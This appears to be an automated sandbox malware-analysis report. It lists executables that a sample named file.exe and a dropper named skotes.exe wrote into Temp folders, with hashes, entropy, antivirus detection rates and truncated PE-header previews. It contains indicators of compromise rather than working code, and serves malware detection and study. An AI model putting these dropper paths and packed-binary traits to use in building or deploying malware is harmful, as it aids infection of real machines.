                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):973312
                                                                                                                                                                                                                                            Entropy (8bit):6.709598517838304
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24576:uqDEvCTbMWu7rQYlBQcBiT6rprG8a9ZsrY:uTvC/MTQYxsWR7a9
                                                                                                                                                                                                                                            MD5:3F7BA360C993567431731DD9E8EB6A67
                                                                                                                                                                                                                                            SHA1:86B020C1350C91FF191C66B7EF4482C444EEE7DE
                                                                                                                                                                                                                                            SHA-256:4C68695DBD51D87109946460ADCB0CD159B3331D0CE13F6A26755E3C8D34E017
                                                                                                                                                                                                                                            SHA-512:DD8E2DE9DF549B0442E7F4669D061F8024AAA73B1E30915B99AF5C98A9AEED7563B8312CD3CF62325A03CBB191BA75DFD94DA5FD84E056D380303AE4CD4B1E13
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...%MWg.........."..........*......w.............@..........................0............@...@.......@.....................d...|....@...o.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....o...@...p..................@..@.reloc...u.......v...d..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exe
                                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:V:V
                                                                                                                                                                                                                                            MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                                                                                            SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                                                                                                                            SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                                                                                            SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:0
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exe
                                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:V:V
                                                                                                                                                                                                                                            MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                                                                                            SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                                                                                                                            SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                                                                                            SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:0
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1966080
                                                                                                                                                                                                                                            Entropy (8bit):7.935055391266163
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:pUoHhHRVeu+IIZoonat2m8GRMZpM0IKyNa:HHnVexGEg2mfMHDIR
                                                                                                                                                                                                                                            MD5:F7A47830F40CC4B6A06D777FAB2F42F9
                                                                                                                                                                                                                                            SHA1:5302227FBAC3AEA59D3AA18DC1E429EBE448C732
                                                                                                                                                                                                                                            SHA-256:8A331CA76C2B919F30406FF66A92DB0E27AE6AF9725749A80959B42656871536
                                                                                                                                                                                                                                            SHA-512:67251194DB27BBB06CC3638C7FD453CC66F54B6E9AA1421CBD05BA5AA410F333B83F5587186BBD0B2026F05DA1119EED68C8CFA64511B9C4D81D9A13D9634F1B
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!J..@$..@$..@$......@$......@$......@$..._..@$..@%..@$......@$......@$......@$.Rich.@$.........PE..L......d.............................P............@.................................h.......................................Z.B.n.....@.h!..................................................0....................................................... . ..@......T..................@....rsrc...h!....@......d..............@....idata ......B.....................@... .@).. B.....................@...klrfnhju.....`k.....................@...auusyycz.....@......................@....taggant.0...P..."..................@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2793472
                                                                                                                                                                                                                                            Entropy (8bit):6.552276868804247
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:/qf7Pk5ZCPKpKahkO1GRRPWxMIVEWh0LiHTnO32FFigsEe:Yk5ZCSpKnZYTZqLiHTAufsE
                                                                                                                                                                                                                                            MD5:BB21543A1E27325F9EA87BAB89FACF4B
                                                                                                                                                                                                                                            SHA1:2DBDF71B803BAF20BF11B1E0B1C9BD75FCCB2C51
                                                                                                                                                                                                                                            SHA-256:6066601BD1264D08E87E2494C02EA6AEA5EFF0657F6B76CA33853C98F3544A45
                                                                                                                                                                                                                                            SHA-512:4EC5DFAA1EBCCEAD38C4684840C5F95789F481FE12F7D34C00B79A181CF2B33E44B900119C389485D26329FB796C2D6B2A8C0558051F0198F062BD15C9D76BCE
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............+.. ...`....@.. .......................@+.....Gx+...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...ixnajgom.@*......>*..:..............@...seyuqqyf. ....*......x*.............@....taggant.@....+.."...~*.............@...................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exe
                                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:V:V
                                                                                                                                                                                                                                            MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                                                                                            SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                                                                                                                            SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                                                                                            SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:0
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):97296
                                                                                                                                                                                                                                            Entropy (8bit):7.9982317718947025
                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                            SSDEEP:1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
                                                                                                                                                                                                                                            MD5:E6743949BBF24B39B25399CD7C5D3A2E
                                                                                                                                                                                                                                            SHA1:DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
                                                                                                                                                                                                                                            SHA-256:A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
                                                                                                                                                                                                                                            SHA-512:3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:XM .4Ih..]...t.&.s...v.0{.v.vs'...:.l.h...e.....R....1...r.R+Fk*....~.s.....Q.....r.T.b.....~c..[........;...j.@.0.%.....x...v.w.....<ru....Yre;.b6...HQ-...8.B..Q.a...R.:.h&r.......=.;r.k..T.@....l..;#..3!.O..x.}........y'<.GfQ.K.#.L5v..].......d....N{e..@................A\..<.t.u.X.O.n..Z.. .Xb.O<.*Z...h~.(.W.f.z.V.4..L...%5.0...H..`s...y.B......(IL5s:aS}X.......M9.J.o....).'..M;n6]...W..n....)...L...._..e.....>....[....RA.........'...6.N..g6....IY.%h.. 3r....^..\.b~y./....h.2......ZLk....u}..V..<.fbD.<!.._2.zo..IE...P..*O...u......P.......w#.6N..&l.R}GI...LY...N.yz..j..Hy.'..._.5..Pd9.y..+....6.q*...).G.c...L#....5\.M....5U])....U(..~H.m....Y....G1.r.4.B..h........P..]i...M%.............)q......]....~|..j...b..K!..N.7R.}T.2bsq..1...L^..!.|q.D'...s.Ln...D@..bn%0=b.Q1.....+l...QXO|.......NC.d......{.0....8F.....<.W.y..{o..j.3.....n..4.....eS]. K...o.B.H~.sh.1....m8....6{.ls..R..q..~....w._;....X*.#..U....6n.ODbT.+Zc....q....S.$-S`YT....
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1831936
                                                                                                                                                                                                                                            Entropy (8bit):7.945744491852467
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24576:3/W9aHhoKroal0+5Z+WRmxF+KsRp8JPsFJnqvNqChsjTrQQ5NOVRCiS/us1z1FzT:3ugHhoMzN5cWvqVsSvACyjnQQ5NOPq
                                                                                                                                                                                                                                            MD5:3A76AB70C01DA0F818F89BFE4E904EE3
                                                                                                                                                                                                                                            SHA1:C0EBF4AFAAE2542F315C72853AAAAB84E1A59874
                                                                                                                                                                                                                                            SHA-256:31FA2D30829B1EDDE94CC00CAC6AF01BF9075CB7DBA356301566624F586AA2C1
                                                                                                                                                                                                                                            SHA-512:06AD07E86E5A896768792C77197F0029489F81D55C71874D94F5F718A3CF55BC3F2740E0F43479DEEA3FAE49CE1ADF5BAF5B03227162FB827303AF2C14C0A867
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(.......0j...........@..........................`j......q....@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......z..............@... ..+...$......|..............@...jkfvjajp.P....O..P...~..............@...yofpcxnn..... j.....................@....taggant.0...0j.."..................@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):828416
                                                                                                                                                                                                                                            Entropy (8bit):7.805484562629924
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:43+0sQQRz2L8CqyGAuDi5r5jBlhyyZzWDtkfDdEIHiyO+rBlhyyZzWDtkfDdEIH7:4BqSL8CWopBCyqXIdXBCyqXId5
                                                                                                                                                                                                                                            MD5:9A2CC9D6C6282E7B2A0FF5649A70B0DF
                                                                                                                                                                                                                                            SHA1:99C7C3969C9AB39261B59F047514FF7DE2BC4C07
                                                                                                                                                                                                                                            SHA-256:B08F2B65885B9AE1825D27DDF6DC9189641E0F8817999F4386DA55FFCC548287
                                                                                                                                                                                                                                            SHA-512:B61AA465D601A75426129B2096E900C008FAEEE6D67B729BF3B2FDEEF6957934E9BBA7353AD55B499C2722F5381C9CC684F867E4C2B7958E743D1A459EAE88D7
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Vg............................r.............@.......................................@..................................<..<....................................................................................>..x............................text............................... ..`.rdata..<...........................@..@.data....'...`.......L..............@....TLS.................d..............@....rsrc................f..............@..@.reloc........... ...h..............@..B.bss................................@....bss.........`......................@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1966080
                                                                                                                                                                                                                                            Entropy (8bit):7.935055391266163
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:pUoHhHRVeu+IIZoonat2m8GRMZpM0IKyNa:HHnVexGEg2mfMHDIR
                                                                                                                                                                                                                                            MD5:F7A47830F40CC4B6A06D777FAB2F42F9
                                                                                                                                                                                                                                            SHA1:5302227FBAC3AEA59D3AA18DC1E429EBE448C732
                                                                                                                                                                                                                                            SHA-256:8A331CA76C2B919F30406FF66A92DB0E27AE6AF9725749A80959B42656871536
                                                                                                                                                                                                                                            SHA-512:67251194DB27BBB06CC3638C7FD453CC66F54B6E9AA1421CBD05BA5AA410F333B83F5587186BBD0B2026F05DA1119EED68C8CFA64511B9C4D81D9A13D9634F1B
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!J..@$..@$..@$......@$......@$......@$..._..@$..@%..@$......@$......@$......@$.Rich.@$.........PE..L......d.............................P............@.................................h.......................................Z.B.n.....@.h!..................................................0....................................................... . ..@......T..................@....rsrc...h!....@......d..............@....idata ......B.....................@... .@).. B.....................@...klrfnhju.....`k.....................@...auusyycz.....@......................@....taggant.0...P..."..................@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1858560
                                                                                                                                                                                                                                            Entropy (8bit):7.946449345306196
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:b7U028g8Lcse/gNuf5XFc8dSUylDRyioglMgH6qa:k8g8fe/gqcVlDRogue
                                                                                                                                                                                                                                            MD5:2B86AAB9799FDB49D90E8D5C3F773C33
                                                                                                                                                                                                                                            SHA1:73F675BFC40AE943545488F8279FF6969D47588B
                                                                                                                                                                                                                                            SHA-256:07A31FF1A605C2C322B555D4A0343F99FB780AB06B05DC6C0A8C0A426F5BD04A
                                                                                                                                                                                                                                            SHA-512:679F83173542BB3490685C53EEC897B28676CF7F3F52714DB5D9D37507D2998D2BFEED1125DADBED19809CD97D803F006944BCD0EAD6E5838AADC01B3B0E8250
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Ug.............................@I...........@..........................pI......{....@.................................\@..p....0.......................A...................................................................................... . . .......B..................@....rsrc........0.......R..............@....idata .....@.......V..............@... ..*..P.......X..............@...hkjfghfg.....P/......Z..............@...gtwwivgb.....0I......6..............@....taggant.0...@I.."...:..............@...................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1831936
                                                                                                                                                                                                                                            Entropy (8bit):7.945744491852467
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24576:3/W9aHhoKroal0+5Z+WRmxF+KsRp8JPsFJnqvNqChsjTrQQ5NOVRCiS/us1z1FzT:3ugHhoMzN5cWvqVsSvACyjnQQ5NOPq
                                                                                                                                                                                                                                            MD5:3A76AB70C01DA0F818F89BFE4E904EE3
                                                                                                                                                                                                                                            SHA1:C0EBF4AFAAE2542F315C72853AAAAB84E1A59874
                                                                                                                                                                                                                                            SHA-256:31FA2D30829B1EDDE94CC00CAC6AF01BF9075CB7DBA356301566624F586AA2C1
                                                                                                                                                                                                                                            SHA-512:06AD07E86E5A896768792C77197F0029489F81D55C71874D94F5F718A3CF55BC3F2740E0F43479DEEA3FAE49CE1ADF5BAF5B03227162FB827303AF2C14C0A867
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(.......0j...........@..........................`j......q....@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......z..............@... ..+...$......|..............@...jkfvjajp.P....O..P...~..............@...yofpcxnn..... j.....................@....taggant.0...0j.."..................@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):973312
                                                                                                                                                                                                                                            Entropy (8bit):6.709598517838304
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24576:uqDEvCTbMWu7rQYlBQcBiT6rprG8a9ZsrY:uTvC/MTQYxsWR7a9
                                                                                                                                                                                                                                            MD5:3F7BA360C993567431731DD9E8EB6A67
                                                                                                                                                                                                                                            SHA1:86B020C1350C91FF191C66B7EF4482C444EEE7DE
                                                                                                                                                                                                                                            SHA-256:4C68695DBD51D87109946460ADCB0CD159B3331D0CE13F6A26755E3C8D34E017
                                                                                                                                                                                                                                            SHA-512:DD8E2DE9DF549B0442E7F4669D061F8024AAA73B1E30915B99AF5C98A9AEED7563B8312CD3CF62325A03CBB191BA75DFD94DA5FD84E056D380303AE4CD4B1E13
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...%MWg.........."..........*......w.............@..........................0............@...@.......@.....................d...|....@...o.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....o...@...p..................@..@.reloc...u.......v...d..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2793472
                                                                                                                                                                                                                                            Entropy (8bit):6.552276868804247
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:/qf7Pk5ZCPKpKahkO1GRRPWxMIVEWh0LiHTnO32FFigsEe:Yk5ZCSpKnZYTZqLiHTAufsE
                                                                                                                                                                                                                                            MD5:BB21543A1E27325F9EA87BAB89FACF4B
                                                                                                                                                                                                                                            SHA1:2DBDF71B803BAF20BF11B1E0B1C9BD75FCCB2C51
                                                                                                                                                                                                                                            SHA-256:6066601BD1264D08E87E2494C02EA6AEA5EFF0657F6B76CA33853C98F3544A45
                                                                                                                                                                                                                                            SHA-512:4EC5DFAA1EBCCEAD38C4684840C5F95789F481FE12F7D34C00B79A181CF2B33E44B900119C389485D26329FB796C2D6B2A8C0558051F0198F062BD15C9D76BCE
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                            Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............+.. ...`....@.. .......................@+.....Gx+...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...ixnajgom.@*......>*..:..............@...seyuqqyf. ....*......x*.............@....taggant.@....+.."...~*.............@...................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3279872
                                                                                                                                                                                                                                            Entropy (8bit):6.678543007246508
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:NcyRqEl5yhyZfpyqcm8consSF1nWSKiYRl7Ea+iwFCrlxbuGLfd:ZRGhyZfpyzmVtAAJZJ9+iwFCnbB7d
                                                                                                                                                                                                                                            MD5:D75B31BA6F3BEBDB12B9C28A09D444F9
                                                                                                                                                                                                                                            SHA1:80F5231691EC242EB62324BDF2986C50AE9B2AC8
                                                                                                                                                                                                                                            SHA-256:E951C2F841B3CA0B3BB4BA865AB40D102A6074A4B6F74C0C10D99F6EA125C2CF
                                                                                                                                                                                                                                            SHA-512:24DE73A3543D2474CE6C40EC11C814361F3200B752FF165C8283628504B7BBA5090E48713314FDDDE076518060CA18FE7043113AEED24E36E29FB07C057D77ED
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................2...........@..........................@2.......2...@.................................W...k...........................x.1.............................(.1..................................................... . ............................@....rsrc...............................@....idata ............................@...cmuiqwlw.P+......N+.................@...afwwhgey......2.......1.............@....taggant.0....2.."....1.............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                            Size (bytes):26
                                                                                                                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                            File Type:ISO Media, MP4 Base Media v1 [ISO 14496-12:2003]
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                                                                            Entropy (8bit):0.4593089050301797
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:9SP0nUgwyZXYI65yFRX2D3GNTTfyn0Mk1iA:9SDKaIjo3UzyE1L
                                                                                                                                                                                                                                            MD5:D910AD167F0217587501FDCDB33CC544
                                                                                                                                                                                                                                            SHA1:2F57441CEFDC781011B53C1C5D29AC54835AFC1D
                                                                                                                                                                                                                                            SHA-256:E3699D9404A3FFC1AFF0CA8A3972DC0EF38BDAB927741E9F627C7C55CEA42E81
                                                                                                                                                                                                                                            SHA-512:F1871BF28FF25EE52BDB99C7A80AB715C7CAC164DCD2FD87E681168EE927FD2C5E80E03C91BB638D955A4627213BF575FF4D9EECAEDA7718C128CF2CE8F7CB3D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:... ftypisom....isomiso2avc1mp41....free....mdat..........E...H..,. .#..x264 - core 152 r2851 ba24899 - H.264/MPEG-4 AVC codec - Copyleft 2003-2017 - http://www.videolan.org/x264.html - options: cabac=1 ref=3 deblock=1:0:0 analyse=0x3:0x113 me=hex subme=7 psy=1 psy_rd=1.00:0.00 mixed_ref=1 me_range=16 chroma_me=1 trellis=1 8x8dct=1 cqm=0 deadzone=21,11 fast_pskip=1 chroma_qp_offset=-2 threads=4 lookahead_threads=1 sliced_threads=0 nr=0 decimate=1 interlaced=0 bluray_compat=0 constrained_intra=0 bframes=3 b_pyramid=2 b_adapt=1 b_bias=0 direct=1 weightb=1 open_gop=0 weightp=2 keyint=250 keyint_min=25 scenecut=40 intra_refresh=0 rc_lookahead=40 rc=crf mbtree=1 crf=23.0 qcomp=0.60 qpmin=0 qpmax=69 qpstep=4 ip_ratio=1.40 aq=1:1.00......e...+...s|.kG3...'.u.."...,J.w.~.d\..(K....!.+..;....h....(.T.*...M......0..~L..8..B..A.y..R..,.zBP.';j.@.].w..........c......C=.'f....gI.$^.......m5V.L...{U..%V[....8......B..i..^,....:...,..5.m.%dA....moov...lmvhd...................(...........
                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                                                                            Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                            Malicious:false
